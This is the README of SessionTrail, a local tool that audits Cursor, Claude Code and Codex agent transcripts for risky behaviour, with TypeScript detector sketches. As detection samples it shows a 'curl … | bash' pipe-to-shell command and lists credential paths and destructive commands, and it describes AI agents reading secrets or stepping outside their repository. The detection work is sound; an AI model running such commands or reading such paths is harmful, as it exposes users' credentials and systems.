Conalh/SessionTrail

GitHub: Conalh/SessionTrail

SessionTrail is a local-only CLI tool that audits AI-agent JSONL session transcripts to detect and report high-risk runtime behavior.

Stars: 0 | Forks: 0

# SessionTrail

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Language: TypeScript](https://img.shields.io/badge/language-TypeScript-3178c6.svg)](package.json) [![Local-only](https://img.shields.io/badge/local--only-uploads%20nothing-2ea44f.svg)](#how-it-works) [![Release](https://img.shields.io/github/v/release/Conalh/SessionTrail)](https://github.com/Conalh/SessionTrail/releases)

**A transcript behavior review tool for AI-agent sessions.** SessionTrail reads Cursor, Claude Code, and Codex JSONL transcripts and flags what the agent actually attempted: credential reads, `curl | sh`, unknown MCP servers, cross-session snooping, network requests, and writes outside the repo.

Prompts and PR diffs show only intent and output. Transcripts show runtime behavior. SessionTrail turns those local JSONL traces into structured reports that you can review, gate on, or merge with the other tools in the agent-gov suite.

```mermaid
flowchart LR
    Cursor["Cursor JSONL"] --> Trail
    Claude["Claude Code JSONL"] --> Trail
    Codex["Codex JSONL"] --> Trail
    Repo["Declared repo root<br/>allowlist config"] --> Trail
    Trail[("SessionTrail<br/>runtime behavior audit")] --> Report["Review output<br/>annotations · markdown · JSON · SARIF"]
    Report --> Reviewer["Reviewer sees<br/>what the agent attempted"]

    classDef input fill:#1e293b,stroke:#334155,color:#e2e8f0
    classDef engine fill:#0f172a,stroke:#1e293b,color:#e2e8f0,stroke-width:2px
    classDef output fill:#0c4a6e,stroke:#0369a1,color:#e0f2fe
    class Cursor,Claude,Codex,Repo input
    class Trail engine
    class Report,Reviewer output
```

**See also:** [AgentPulse](https://github.com/Conalh/AgentPulse) for live trajectory monitoring · [GovVerdict](https://github.com/Conalh/GovVerdict) for producing a merged suite verdict · [agent-gov-core](https://github.com/Conalh/agent-gov-core) for the shared report schema.

## When to use it

SessionTrail is a **post-hoc** audit tool: it reviews transcripts an agent has already produced, not diffs or configuration.

| Tool | Input | Catches / decides | Output | Use when |
|---|---|---|---|---|
| [warden](https://github.com/Conalh/warden) | policy + tool action | allow / deny / ask | verdict | You need deterministic runtime policy decisions |
| [barbican](https://github.com/Conalh/barbican) | MCP tools/list + tools/call | denied calls, ask handling, tool poisoning | enforcing MCP proxy + report | You need MCP runtime enforcement |
| [ScopeTrail](https://github.com/Conalh/ScopeTrail) | PR base/head agent config | permission/config drift | annotations + report | A PR changed agent config |
| [PolicyMesh](https://github.com/Conalh/PolicyMesh) | current repo policy/config files | conflicting rules across agent surfaces | report / SARIF | The current policy is inconsistent |
| [CapabilityEcho](https://github.com/Conalh/CapabilityEcho) | PR diff | new executable capabilities | annotations + report | Code gained network/subprocess/eval/lifecycle/workflow powers |
| [TaskBound](https://github.com/Conalh/TaskBound) | declared task + PR diff | scope creep | annotations + report | The agent may have strayed from the task |
| **SessionTrail** | Cursor/Claude/Codex JSONL transcripts | risky runtime behavior | report / SARIF | An agent session has already run |
| [GovVerdict](https://github.com/Conalh/GovVerdict) | JSON reports | deduplicated suite verdict | merged report | You want one final review verdict |
| [AgentPulse](https://github.com/Conalh/AgentPulse) | live session events | trajectory state | terminal dashboard | You want live session observation |
| [agent-gov-core](https://github.com/Conalh/agent-gov-core) | shared schema/parsers | common Finding/Report model | library | Tools need shared report primitives |

## Why this exists

AI agents often do things their prompt never asked for: open `~/.ssh/id_rsa`, read another session's transcript, pipe a shell installer in from the network, or call an MCP server nobody approved. Runtime logs record these tool calls as plain JSONL, but few teams read them.

SessionTrail exists to make runtime behavior reviewable after a session ends. It focuses on **tool intent**: what the agent tried to do, according to the transcript of its run.

## What it catches

| Behavior class | Examples |
| --- | --- |
| **Out-of-repo access** | Reads/writes outside `--repo`, including home-directory metadata and broad path scans. |
| **Privileged paths** | `.ssh`, `.aws`, `.kube`, `.gnupg`, `/etc/shadow`, and agent metadata directories. |
| **High-risk shell intent** | `curl \| sh`, publish commands, broad deletes, push operations, and obfuscated shell pipelines. |
| **Runtime integrations** | MCP calls, external network intent, subagent spawns, cross-session transcript access. |

## Quick start

```bash
git clone https://github.com/Conalh/SessionTrail.git
cd SessionTrail
npm install
npm run bundle
node bundle/index.js audit \
  --transcript test/fixtures/rogue-session.jsonl \
  --repo C:/Dev/Demo \
  --format markdown
```

The command runs against the bundled rogue-agent fixture and reports `CRITICAL`. Replace `--transcript` with a real Cursor / Claude Code / Codex JSONL file to audit your own sessions, or use `--transcript-dir` to scan a whole directory of transcripts.

## Example output

```
SessionTrail behavior review: CRITICAL
Agent runtimes: cursor x9
Parsed: 10 lines, 9 events
Summary: home or Cursor metadata access; reads outside the repository; cross-session transcript reads; broad home-directory scans; shell command invocations; MCP tool invocations; external network requests; subagent spawns; writes outside the repository

[HIGH] Home directory access: agent read C:/Users/conno/.cursor/plans/demo.plan.md
[MEDIUM] Read outside repository: C:/Users/conno/.cursor/plans/demo.plan.md
[MEDIUM] Cross-session transcript read: .../old-session/old-session.jsonl
[HIGH] Broad path scan: agent scanned a very broad home-directory path
[HIGH] Shell command: curl https://example.com/install.sh | bash
[MEDIUM] MCP tool invoked: cursor-app-control/move_agent_to_root
[MEDIUM] Network request via WebFetch: https://example.com/bootstrap
[LOW] Subagent spawned: explore
[CRITICAL] Write outside repository: agent attempted to write outside the declared repository root
```

`--format json` emits the standard `agent-gov-core` Report envelope. Each entry conforms to the shared `Finding` schema, so SessionTrail output can be combined with the other suite tools through GovVerdict:

```json
{
  "schemaVersion": "1.0",
  "tool": "session_trail",
  "rating": "critical",
  "findings": [
    {
      "tool": "session_trail",
      "kind": "session_trail.shell_command_invoked",
      "severity": "high",
      "message": "Shell command: curl https://example.com/install.sh | bash",
      "location": { "file": "test/fixtures/rogue-session.jsonl", "line": 7 },
      "fingerprint": "..."
    }
  ],
  "data": {
    "toolInvocationCount": 9,
    "uniqueToolCount": 7,
    "runtimeUsage": { "cursor": 9 }
  }
}
```

## How it works

- Runs entirely on your local machine against local JSONL transcript files. **Uploads nothing by default**: no hosted scanner, no telemetry, and no account required.
- Parses Cursor (`tool_use` blocks), Claude Code (`tool_use` blocks with a per-message `cwd`), and Codex (`response_item` function calls) transcripts into a normalized tool-event stream.
- Scores each event against a fixed set of behavior detectors covering **12 finding types**: reads and writes outside `--repo`, privileged paths, home and agent-metadata directories, cross-session transcript access, broad scans of the user root, high-risk shell pipelines, MCP calls, external network intent, and subagent spawns, plus the coverage-gap signals described below.
- **Reads shell intent through obfuscation.** Commands are deeply tokenized: payloads nested in `bash -c "…"`, `$(…)`, and backticks are recursively flattened, and the verb head is normalized (`c""url`, `c\url`, and `sudo`/`env` wrappers are stripped), so a high-risk verb cannot evade detection by hiding inside a wrapper. Forms such as `curl … | sh`, `npm publish`, `rm -rf`, and `git push` always raise severity and **cannot be allowlisted**.
- **Coverage gaps are not read as clean.** When the parser skips malformed transcript lines, or a transcript file in directory mode exceeds the input byte cap, this surfaces as `parse_lines_skipped` or `transcript_file_skipped`. Truncated, corrupt, or oversized transcript input reports the gap instead of passing as a clean session.
- Emits findings using the standard `Finding` schema from [agent-gov-core](https://github.com/Conalh/agent-gov-core), with a stable fingerprint for each finding so that both cross-tool dedup and SARIF dedup work. Denied operations, tool results, and approval results are included in the analysis where stable transcript fields exist across runtimes.

## Design choices worth noting

- **Transcript-first.** SessionTrail reviews what the runtime recorded, not what the prompt claimed or what the final diff contains.
- **Runtime normalization.** Cursor, Claude Code, and Codex events are normalized into a single tool-event stream before detection.
- **Visible allowlist.** `.sessiontrail.json` can lower the severity of expected behavior, but high-risk patterns such as `curl | sh`, `npm publish`, `rm -rf`, and `git push` cannot be hidden.
- **Suite-ready output.** JSON uses the shared `Finding` contract, so GovVerdict can merge it with the static PR-time tools.
- **Tested.** 67 tests (`npm test`) cover all three transcript formats, every finding type, shell de-nesting and verb-head obfuscation, allowlist precedence, and the ReDoS and homograph-host guards.

## Options

CLI flags (`sessiontrail audit ...`):

| Flag | Default | Purpose |
| --- | --- | --- |
| `--transcript` | (none) | A single JSONL transcript to audit. |
| `--transcript-dir` | (none) | Audit every JSONL file in a directory. Mutually exclusive with `--transcript`. |
| `--repo` | `cwd` | Repository root used to decide whether behavior is inside or outside the repo. Compared as a string, so transcripts recorded on Windows can be reviewed on a Linux runner. |
| `--format` | `text` | `text`, `markdown`, `json`, `github`, or `sarif`. |
| `--json-out` | (none) | Also write the JSON report to a file. |
| `--markdown-out` | (none) | Also write the Markdown report to a file. |
| `--sarif-out` | (none) | Also write a SARIF 2.1.0 report that can be uploaded with `github/codeql-action/upload-sarif`. |
| `--config` | `.sessiontrail.json` in the repo root | Allowlist file. Useful in a monorepo when the audit root is not where the config file lives. |
| `--fail-on` | `none` | Exit with code 1 when the session rating reaches `low`, `medium`, `high`, or `critical`. |

### Allowlist (`.sessiontrail.json`)

Place this file at the repo root to declare expected behavior. Matching findings are downgraded to `low`: still visible in the report, but not enough to trip `--fail-on medium`. High-risk pattern detection always takes precedence and **cannot** be allowlisted.

The allowlist treats its own input as untrusted, because in a `pull_request` workflow a PR can carry a malicious `.sessiontrail.json`. User regexes with a nested unbounded quantifier shape (`(a+)+`) are rejected at compile time, and the input passed to each regex is capped at 4 KB, so a PR cannot pair a catastrophic-backtracking pattern with a long command to hang the runner. `allowedNetworkHosts` is matched against the parsed URL hostname using exact-match or dot-suffix rules, so `internal.example.com.evil.test` does **not** match an allowlisted `internal.example.com`.

```json
{
  "allowedMcpServers": ["github-pr-helper"],
  "benignShellPatterns": ["^cargo\\s+test", "^deno\\s+task\\s+\\w+$"],
  "allowedNetworkHosts": ["internal.example.com"]
}
```

See [`.sessiontrail.json.example`](.sessiontrail.json.example) for a copy-ready starter.

### GitHub Action

```yaml
- uses: actions/checkout@v6
- uses: Conalh/SessionTrail@v0.6.4
  with:
    transcript: path/to/session.jsonl
    repo: .
    fail-on: none
```

Action outputs: `rating`, `finding-count`, `tool-invocation-count`, `unique-tool-count`, `runtime-count`, `sarif-file`. Chain `sarif-file` into `github/codeql-action/upload-sarif` to surface findings in the Security tab. The action uploads nothing by default: it reads the transcript from the workspace, writes the Markdown report to the step summary, and emits severity-aware inline annotations.

## Part of the agent-gov suite

These local-only, open-source tools review AI-agent PRs and coding sessions for config drift, policy mismatch, and scope creep. Pick the tool that matches the failure mode; compose through GovVerdict.

| Repo | What it catches |
| --- | --- |
| [ScopeTrail](https://github.com/Conalh/ScopeTrail) | Agent config drift between PR base and head. |
| [PolicyMesh](https://github.com/Conalh/PolicyMesh) | Conflicting agent instructions and config drift that make behavior unreproducible. |
| [CapabilityEcho](https://github.com/Conalh/CapabilityEcho) | Capability drift introduced by code, manifests, workflows, and Dockerfiles. |
| [TaskBound](https://github.com/Conalh/TaskBound) | Scope creep between the declared task and the actual diff. |
| **SessionTrail** *(this repo)* | High-risk runtime behavior in Cursor / Claude Code / Codex session transcripts. |
| [AgentPulse](https://github.com/Conalh/AgentPulse) | Live local trajectory verdicts for active agent sessions. |
| [GovVerdict](https://github.com/Conalh/GovVerdict) | Merges the JSON reports from the tools above into one deduplicated review report. |
| [agent-gov-core](https://github.com/Conalh/agent-gov-core) | Shared parsers, the standard `Finding` schema, and `mergeFindings`. |
| [agent-gov-demo](https://github.com/Conalh/agent-gov-demo) | Demo sandbox with a rogue PR that trips all five review tools. |

See the whole stack work on one rogue PR: **[agent-gov-demo#1](https://github.com/Conalh/agent-gov-demo/pull/1)**.

MIT. Bug reports and false-positive reports are welcome via [Issues](https://github.com/Conalh/SessionTrail/issues).
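
### Illustrative sketch: verb-head normalization

To make the verb-head normalization described under "How it works" more concrete, here is a minimal TypeScript sketch. It is not SessionTrail's implementation: `normalizeVerbHead`, `isPipeToShell`, and the wrapper, downloader, and shell lists are hypothetical names chosen for illustration, and the sketch does not attempt the recursive flattening of `bash -c "…"`, `$(…)`, or backticks.

```typescript
// Hypothetical helpers for illustration only; not SessionTrail's actual API.
const WRAPPERS = new Set(["sudo", "env"]);
const DOWNLOADERS = new Set(["curl", "wget"]);
const SHELLS = new Set(["sh", "bash", "zsh"]);

// Return the first "real" verb of a command segment, with quote and
// backslash obfuscation removed and sudo/env wrappers skipped.
function normalizeVerbHead(segment: string): string {
  for (const token of segment.trim().split(/\s+/)) {
    if (token === "") continue;
    // Skip VAR=value assignments such as those that follow `env`.
    if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(token)) continue;
    // c""url and c\url both collapse to curl.
    const bare = token.replace(/["'\\]/g, "").toLowerCase();
    if (WRAPPERS.has(bare)) continue;
    return bare;
  }
  return "";
}

// True when a downloader's output is piped into a shell later in the pipeline.
// The regex splits on a single `|` but leaves the `||` operator alone.
function isPipeToShell(command: string): boolean {
  const heads = command.split(/(?<!\|)\|(?!\|)/).map(normalizeVerbHead);
  const downloadAt = heads.findIndex((head) => DOWNLOADERS.has(head));
  return downloadAt !== -1 && heads.slice(downloadAt + 1).some((head) => SHELLS.has(head));
}
```

In this simplified form, wrapper flags such as `sudo -u root` are not handled; a real detector would need a fuller tokenizer.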
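
### Illustrative sketch: surfacing skipped transcript lines

The "coverage gaps are not read as clean" idea can be sketched as a JSONL parser that counts what it could not read instead of silently dropping it. This is an assumption-laden sketch, not the project's parser: `parseJsonl`, `ParseResult`, and `linesSkipped` are hypothetical names, and treating non-object JSON values as skipped is a choice made here for illustration.

```typescript
// Hypothetical result shape; SessionTrail reports this condition as a
// `parse_lines_skipped` finding, but its internal types are not shown in this README.
interface ParseResult {
  events: object[];
  linesSkipped: number;
}

function parseJsonl(text: string): ParseResult {
  const events: object[] = [];
  let linesSkipped = 0;
  for (const line of text.split(/\r?\n/)) {
    if (line.trim() === "") continue; // blank lines are not a coverage gap
    try {
      const value: unknown = JSON.parse(line);
      if (typeof value === "object" && value !== null) {
        events.push(value);
      } else {
        linesSkipped++; // valid JSON, but not a record (assumption)
      }
    } catch {
      linesSkipped++; // malformed or truncated line
    }
  }
  return { events, linesSkipped };
}
```

A caller can then treat any `linesSkipped > 0` as a reportable gap rather than concluding that the session was clean.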
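
### Illustrative sketch: allowlist host matching

The `allowedNetworkHosts` rule from the Allowlist section (exact match or dot-suffix match against the parsed hostname) can be illustrated as follows. `hostIsAllowed` is a hypothetical helper, and reading "dot-suffix" as "the hostname ends with `.` plus the allowlisted entry" is an assumption; the actual implementation may differ.

```typescript
// Hypothetical helper for illustration; not SessionTrail's actual API.
function hostIsAllowed(rawUrl: string, allowedHosts: string[]): boolean {
  let hostname: string;
  try {
    // Match on the parsed hostname, never on the raw URL string.
    hostname = new URL(rawUrl).hostname.toLowerCase();
  } catch {
    return false; // unparseable URLs never match the allowlist
  }
  return allowedHosts.some((entry) => {
    const allowed = entry.toLowerCase();
    // Exact match, or a subdomain of the allowlisted host (assumed dot-suffix rule).
    return hostname === allowed || hostname.endsWith("." + allowed);
  });
}
```

Because the comparison is anchored at the end of the hostname and requires a leading dot, `internal.example.com.evil.test` fails both checks, while a substring test on the full URL would have accepted it.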

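Tags: AI agents, GitHub Action, MITM proxy, TypeScript, cloud security monitoring, session auditing, security compliance, security plugins, network proxy, automated attacks, static analysis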